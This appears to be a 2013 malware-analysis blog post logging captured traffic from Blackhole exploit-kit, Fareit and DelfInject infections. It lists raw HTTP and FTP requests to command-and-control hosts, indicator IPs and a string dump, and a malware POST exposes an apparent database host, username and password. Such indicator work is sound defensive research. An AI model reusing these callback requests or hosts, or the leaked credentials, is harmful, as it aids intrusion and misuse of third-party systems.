Something somewhat interesting. Blackhole exploit at
GET /forum/links/public_version.php?yf=30:31:32:2v:1f&qe=2v:1k:1m:32:33:1k:1k:31:
1j:1o&u=1f&hs=w&yy=e&jopa=6797956 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: jindalo.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
SHA256: | 5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257 |
File name: | blackhole.exe |
Detection ratio: | 1 / 46 |
Analysis date: | 2013-04-21 21:37:27 UTC ( 0 minutes ago ) |
https://www.virustotal.com/en/file/5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257/analysis/1366580247/
Ok, nothing new here. Whatever. Thanks for exploiting my Java. Strings is all garbage, Peid balked.
1,400+ UDP 16471 ala ZeroAccess in like 20 minutes and an interesting one on 55755.
GET /app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close
Ok, nothing new here. I'm located in Boca Raton playing golf with Tiger Woods, how did you guess?
__________________________________________
POST /10qVeAAAA/ebH7oAAAAA/rDhlJAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 88.191.130.98:8080
Content-Length: 339
Connection: Keep-Alive
Cache-Control: no-cache
IP Seen on URL Query: http://urlquery.net/report.php?id=1768644
__________________________________________
POST /asp/intro.php HTTP/1.0
Host: 111.68.142.223
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 269
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
User agent is a big indicator here. Somewhat interesting, documented by #MalwareMustDie http://malwaremustdie.blogspot.com/2012/12/the-crime-still-goes-on-trojan-parfeit.html
Consistent with Trojan Fareit callbacks <Hat Tip MalwareMustDie>, but no botid url following this.
__________________________________________
This one looks interesting. Using Bit.ly, but a 301 to google put the kabash on this one.
POST /YddCcn? HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: bit.ly
Connection: Keep-Alive
op=IncluirAvisos&HostBD=dbmy0060%2Ewhservidor%2Ecom&SenhaBD=delphi2020&UsuarioBD=
turckatty_2&DatabaseBD=turckatty_2&sgdb=
Well the user agent is known badness: here and here dating back to 2010.
GET /WggQJ3RVGrKgdj0xLjImaWQ9NDIzODYxMDcxNiZhaWQ9MzA1NjImc2lkPTAmb3M9NS4xLTMyGuzZ
0s7u HTTP/1.0
Host: xlotxdxtorwfmvuzfuvtspel.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Accept-Language: en-us
Connection: close
I surmise this is a check in because I get a 200 OK but the content is empty - just a speculation. Site Sinkholed.
Ok, now for some FTP. The malware calls out to FTP server with user name and password in clear text (most appreciated).
220 Microsoft FTP Service
USER <redacted>
331 Password required for <redacted>.
PASS <redacted>
230 User logged in.
215 Windows_NT
CWD /dados/maxo4/
250 CWD command successful.
PASV
227 Entering Passive Mode (<redacted>).
RETR E174D3044694.jpg
550 The system cannot find the file specified.
This thing tried multiple jpg files, none of which could be found.
| | |
|
Well, I'm not going to let that one go by. |
|
|
Peaked my interest. I go digging and I find a root directory
Interesting, so I download the jpgs that are there.
The worm is a variant on DelfInject.
MZP ÿÿ¸@ º ´ Í!¸ LÍ!This program must be run under Win32 $
Dumping the strings:
DVCLAL
PACKAGEINFO
PORCOS
TDTCONFIG
TFORM1
TFRMDATETIME
xn7
CPlApplet
kernel32.dll
LoadLibraryA
GetProcAddress
VirtualAlloc
VirtualFree
oleaut32.dll
SysFreeString
advapi32.dll
RegQueryValueExW
user32.dll
LoadStringW
msimg32.dll
AlphaBlend
gdi32.dll
UnrealizeObject
version.dll
VerQueryValueW
ole32.dll
OleUninitialize
comctl32.dll
InitializeFlatSB
winspool.drv
OpenPrinterW
ntdll
NtUnmapViewOfSection
Interesting DNS Traffic to a Sprint Wireless Address, no further traffic on this one. Pwned mobile? (Guessing)
00000085 : 00 00 00 01 00 00 03 31 37 33 01 34 03 32 35 30 [.......173.4.250]
00000095 : 02 31 30 07 69 6E 2D 61 64 64 72 04 61 72 70 61 [.10.in-addr.arpa]
173.4.250.10
88.191.130.98:8080
jindalo.ru:8080
111.68.142.223
Additional References:
http://labs.snort.org/iplists/urllist-2012-07-01
http://www.soleranetworks.com/blogs/tag/mozilla4-0-compatible-win32-winhttp-winhttprequest-5/
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=VirTool%3AWin32%2FDelfInject.gen!BI
No comments:
Post a Comment